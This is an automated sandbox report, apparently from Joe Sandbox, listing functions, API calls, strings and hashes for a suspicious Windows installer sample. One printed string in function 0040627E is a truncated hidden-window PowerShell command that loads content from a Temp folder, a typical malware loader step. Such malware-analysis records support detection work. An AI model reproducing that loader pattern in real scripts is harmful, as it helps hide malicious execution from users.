Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-238990537
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004058E3: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
API String ID: 1892508949-720499180
Opcode ID: f783c70205095edd546df2d229ea399aa307a44456b5082c487d023ef568edfb
Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
Opcode Fuzzy Hash: f783c70205095edd546df2d229ea399aa307a44456b5082c487d023ef568edfb
Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E

Function 00405995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
CloseHandle.KERNEL32(?), ref: 004059CB

Strings

Error launching installer, xrefs: 004059A8

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78

Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45

Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45

Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45

Function 0040690B Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45

Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45

Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45

Function 004032C2 Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032D6

Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
SetFilePointer.KERNELBASE(0013942D,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D

Function 004031BA Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 997212bab87f25c02565dd92bd657addcdedc5171226b27ca572324a25b4b09c
Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
Opcode Fuzzy Hash: 997212bab87f25c02565dd92bd657addcdedc5171226b27ca572324a25b4b09c
Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A

Function 0040627E Relevance: 3.0, APIs: 2, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000039,00000039,00000000,00000000,004281E0,00000800,00000002,?,00000000,00000039,00000039,004281E0,?,?,004064F2,80000002), ref: 004062C4
RegCloseKey.KERNELBASE(00000039,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,00000039,004281E0,00000039,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 004062CF

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
